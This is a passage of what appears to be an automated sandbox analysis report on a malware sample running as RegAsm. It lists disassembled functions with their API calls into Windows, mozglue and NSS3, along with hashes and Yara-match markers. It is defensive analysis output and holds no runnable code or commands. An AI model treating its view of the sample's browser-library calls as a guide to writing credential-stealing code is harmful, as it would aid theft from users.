                                                                                • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C8D99FF,?,?,?,?,?,?,?,?,?,6C8D2D6B,?), ref: 6C8FAE7E
                                                                                • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C8D2D6B,?,?,00000000), ref: 6C8FAE89
                                                                                • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C8D2D6B,?,?,00000000), ref: 6C8FAE96
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C8D2D6B,?,?), ref: 6C8FAEA3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                • String ID:
                                                                                • API String ID: 754562246-0
                                                                                • Opcode ID: f6c8b1e5f432e178b4e3be8d3adf61e327633a312d483cf2fd84d8b2c7bd55cb
                                                                                • Instruction ID: 1d7f25fceeeb9324d9fdbac758806b5c6681a71dc474806b44da428564b6bf55
                                                                                • Opcode Fuzzy Hash: f6c8b1e5f432e178b4e3be8d3adf61e327633a312d483cf2fd84d8b2c7bd55cb
                                                                                • Instruction Fuzzy Hash: DD012862B1402857E721912CEE81BEF31588B97AEDF080D31E925C7B01F715DD0742E3
                                                                                Function 6C9EADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteCriticalSection.KERNEL32(6C9EA6D8), ref: 6C9EAE0D
                                                                                • free.MOZGLUE(?), ref: 6C9EAE14
                                                                                • DeleteCriticalSection.KERNEL32(6C9EA6D8), ref: 6C9EAE36
                                                                                • free.MOZGLUE(?), ref: 6C9EAE3D
                                                                                • free.MOZGLUE(00000000,00000000,?,?,6C9EA6D8), ref: 6C9EAE47
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$CriticalDeleteSection
                                                                                • String ID:
                                                                                • API String ID: 682657753-0
                                                                                • Opcode ID: ad20d873526ebcc1c0a45c64805420b2f8e07b41ccd11575c50fd4f67a2a9625
                                                                                • Instruction ID: 77136b32ca1520f38dab7419313b6a6874862540515968400d66f1d1dc75205c
                                                                                • Opcode Fuzzy Hash: ad20d873526ebcc1c0a45c64805420b2f8e07b41ccd11575c50fd4f67a2a9625
                                                                                • Instruction Fuzzy Hash: 14F0F675201B16A7DB059F68D8099277B7CBF8A778718432CE12A83950D739E112C7D1
                                                                                Function 0041A151 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 0041A15D
                                                                                  • Part of subcall function 0041A334: __getptd_noexit.LIBCMT ref: 0041A337
                                                                                  • Part of subcall function 0041A334: __amsg_exit.LIBCMT ref: 0041A344
                                                                                • __getptd.LIBCMT ref: 0041A174
                                                                                • __amsg_exit.LIBCMT ref: 0041A182
                                                                                • __lock.LIBCMT ref: 0041A192
                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0041A1A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                • String ID:
                                                                                • API String ID: 938513278-0
                                                                                • Opcode ID: 8c78c0af6140777fa1bdc48fcf2f5a2d54df20f957d87e2b9a9cf5d36f6c81fa
                                                                                • Instruction ID: 4e3a2c4d0a1e278f0847d9c725dca8c59e2d9a2086bcf68a1c39e98a36d27e27
                                                                                • Opcode Fuzzy Hash: 8c78c0af6140777fa1bdc48fcf2f5a2d54df20f957d87e2b9a9cf5d36f6c81fa
                                                                                • Instruction Fuzzy Hash: 8FF06232A46610AADB25BB665806BCD32905F00729F54010FF410662C2CA7C59D1CA5F
                                                                                Function 00407893 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 441stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00407898
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407DE7
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407DFB
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                  • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                  • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                  • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
                                                                                • String ID: #
                                                                                • API String ID: 3207582090-1885708031
                                                                                • Opcode ID: 2bce3dd55c3cf3d5428d66e77e3048d3e6e068f414916bbddf1a15f1dcc301b1
                                                                                • Instruction ID: 90a0b065f2ce581d2774c055680d4a4ab4ac60e8fee4b98af290d1c90ab0784c
                                                                                • Opcode Fuzzy Hash: 2bce3dd55c3cf3d5428d66e77e3048d3e6e068f414916bbddf1a15f1dcc301b1
                                                                                • Instruction Fuzzy Hash: 41126C71804249EADB15EBE0C956BEEBB74AF28308F5040BEE406725C2DF78274DDB65
                                                                                Function 6C7DD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C7ECBE8: GetCurrentProcess.KERNEL32(?,6C7B31A7), ref: 6C7ECBF1
                                                                                  • Part of subcall function 6C7ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7B31A7), ref: 6C7ECBFA
                                                                                • EnterCriticalSection.KERNEL32(6C83E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD4F2
                                                                                • LeaveCriticalSection.KERNEL32(6C83E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD50B
                                                                                  • Part of subcall function 6C7BCFE0: EnterCriticalSection.KERNEL32(6C83E784), ref: 6C7BCFF6
                                                                                  • Part of subcall function 6C7BCFE0: LeaveCriticalSection.KERNEL32(6C83E784), ref: 6C7BD026
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD52E
                                                                                • EnterCriticalSection.KERNEL32(6C83E7DC), ref: 6C7DD690
                                                                                • LeaveCriticalSection.KERNEL32(6C83E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD751
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                • String ID: MOZ_CRASH()
                                                                                • API String ID: 3805649505-2608361144
                                                                                • Opcode ID: b9755e06167966589afcb3eb87fdae804f22e792c46e924866ace846bee09a54
                                                                                • Instruction ID: 7148d33a0db2c644656519fb595ee6280355530b9f27212a016b8f7ee0c7cc95
                                                                                • Opcode Fuzzy Hash: b9755e06167966589afcb3eb87fdae804f22e792c46e924866ace846bee09a54
                                                                                • Instruction Fuzzy Hash: 5B51E271A047118FD328CF68C29461ABBE1EB99718F15493EE599C7B85D730A800CFE1
                                                                                Function 6C80B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C7B4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C7F3EBD,6C7F3EBD,00000000), ref: 6C7B42A9
                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C80B127), ref: 6C80B463
                                                                                • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C80B4C9
                                                                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C80B4E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _getpidstrlenstrncmptolower
                                                                                • String ID: pid:
                                                                                • API String ID: 1720406129-3403741246
                                                                                • Opcode ID: 81334c6dd7546fbc5ed9ee863e4ccf1439d94534536571fb3556574bea90bfbe
                                                                                • Instruction ID: 8285fa124b6413627b7070e29875d6b4808a7dfc2a8c9621e7f194323a9a5ee0
                                                                                • Opcode Fuzzy Hash: 81334c6dd7546fbc5ed9ee863e4ccf1439d94534536571fb3556574bea90bfbe
                                                                                • Instruction Fuzzy Hash: 17311F31B016198BDB20DFA9DE84AAEB7B5FF04308F540929D80167A41D731AA49CBE1
                                                                                Function 6C866C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C866D36
                                                                                Strings
                                                                                • %s at line %d of [%.10s], xrefs: 6C866D2F
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C866D20
                                                                                • database corruption, xrefs: 6C866D2A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 632333372-598938438
                                                                                • Opcode ID: db39f1636f9f621ebb25fcdff6eec9b82f7413919ed3a7af637a9d196d887f0b
                                                                                • Instruction ID: d4f7b251f034f504d52846833bf572febfa6579d20a73c72644206f8565f48f3
                                                                                • Opcode Fuzzy Hash: db39f1636f9f621ebb25fcdff6eec9b82f7413919ed3a7af637a9d196d887f0b
                                                                                • Instruction Fuzzy Hash: 1421E2706043459BC7208E1ADA41B9AB7F5BF85309F144D2CD8499BF51E772F944C7A1
                                                                                Function 6C99CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C99CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C99CC7B), ref: 6C99CD7A
                                                                                  • Part of subcall function 6C99CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C99CD8E
                                                                                  • Part of subcall function 6C99CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C99CDA5
                                                                                  • Part of subcall function 6C99CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C99CDB8
                                                                                • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C99CCB5
                                                                                • memcpy.VCRUNTIME140(6CA314F4,6CA302AC,00000090), ref: 6C99CCD3
                                                                                • memcpy.VCRUNTIME140(6CA31588,6CA302AC,00000090), ref: 6C99CD2B
                                                                                  • Part of subcall function 6C8B9AC0: socket.WSOCK32(?,00000017,6C8B99BE), ref: 6C8B9AE6
                                                                                  • Part of subcall function 6C8B9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C8B99BE), ref: 6C8B9AFC
                                                                                  • Part of subcall function 6C8C0590: closesocket.WSOCK32(6C8B9A8F,?,?,6C8B9A8F,00000000), ref: 6C8C0597
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                • String ID: Ipv6_to_Ipv4 layer
                                                                                • API String ID: 1231378898-412307543
                                                                                • Opcode ID: 1ed1827cc05d9ebe757c5059006cdb0ac9c16b1bac9f0cb5e00beedff0965ed7
                                                                                • Instruction ID: e1dd670ae2083ab173f6db52ca99894f72ebca60987fed00dae2c9b33ca47c59
                                                                                • Opcode Fuzzy Hash: 1ed1827cc05d9ebe757c5059006cdb0ac9c16b1bac9f0cb5e00beedff0965ed7
                                                                                • Instruction Fuzzy Hash: D411B4F1B003525EDB259F6DDC267623AB8A76A318F045429E70ECBB41E771C44647F2
                                                                                Function 00410CAC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CB7
                                                                                • HeapAlloc.KERNEL32(00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CBE
                                                                                • wsprintfW.USER32 ref: 00410CCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcesswsprintf
                                                                                • String ID: %hs
                                                                                • API String ID: 659108358-2783943728
                                                                                • Opcode ID: 8f38b0a2f3c04c001adce26eef7d4480d116f62b86a175277d757bf0c2474944
                                                                                • Instruction ID: fc663afb3c4838e7790ae00fa1df3b469de1ff5c2c09bb33da5e0fc74afb7745
                                                                                • Opcode Fuzzy Hash: 8f38b0a2f3c04c001adce26eef7d4480d116f62b86a175277d757bf0c2474944
                                                                                • Instruction Fuzzy Hash: 58D05E31781224B7C6202BA4AD0AF667E28EB05AA2F400031FB0D96151C9A1551187EE
                                                                                Function 6C800C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C800CD5
                                                                                  • Part of subcall function 6C7EF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C7EF9A7
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C800D40
                                                                                • free.MOZGLUE ref: 6C800DCB
                                                                                  • Part of subcall function 6C7D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C7D5EDB
                                                                                  • Part of subcall function 6C7D5E90: memset.VCRUNTIME140(6C817765,000000E5,55CCCCCC), ref: 6C7D5F27
                                                                                  • Part of subcall function 6C7D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C7D5FB2
                                                                                • free.MOZGLUE ref: 6C800DDD
                                                                                • free.MOZGLUE ref: 6C800DF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                • String ID:
                                                                                • API String ID: 4069420150-0
                                                                                • Opcode ID: 8b642d6d6b524801c8df52a22828dcdf50fbac95b3986c87a4f3d6ce032fba93
                                                                                • Instruction ID: 8b3e376c59b17da6cc0ef9a4066bad835f9ffae00f79617ed65dea65e19bf7fb
                                                                                • Opcode Fuzzy Hash: 8b642d6d6b524801c8df52a22828dcdf50fbac95b3986c87a4f3d6ce032fba93
                                                                                • Instruction Fuzzy Hash: FD415B75A087848BD320DF29C64479AFBE5BFC9714F118E2EE8D887710D770A484CB92
                                                                                Function 6C80CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C7FDA31,00100000,?,?,00000000,?), ref: 6C80CDA4
                                                                                  • Part of subcall function 6C7CCA10: malloc.MOZGLUE(?), ref: 6C7CCA26
                                                                                  • Part of subcall function 6C80D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C80CDBA,00100000,?,00000000,?,6C7FDA31,00100000,?,?,00000000,?), ref: 6C80D158
                                                                                  • Part of subcall function 6C80D130: InitializeConditionVariable.KERNEL32(00000098,?,6C80CDBA,00100000,?,00000000,?,6C7FDA31,00100000,?,?,00000000,?), ref: 6C80D177
                                                                                • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C7FDA31,00100000,?,?,00000000,?), ref: 6C80CDC4
                                                                                  • Part of subcall function 6C807480: ReleaseSRWLockExclusive.KERNEL32(?,6C8115FC,?,?,?,?,6C8115FC,?), ref: 6C8074EB
                                                                                • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C7FDA31,00100000,?,?,00000000,?), ref: 6C80CECC
                                                                                  • Part of subcall function 6C7CCA10: mozalloc_abort.MOZGLUE(?), ref: 6C7CCAA2
                                                                                  • Part of subcall function 6C7FCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C80CEEA,?,?,?,?,00000000,?,6C7FDA31,00100000,?,?,00000000), ref: 6C7FCB57
                                                                                  • Part of subcall function 6C7FCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C7FCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C80CEEA,?,?), ref: 6C7FCBAF
                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C7FDA31,00100000,?,?,00000000,?), ref: 6C80D058
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
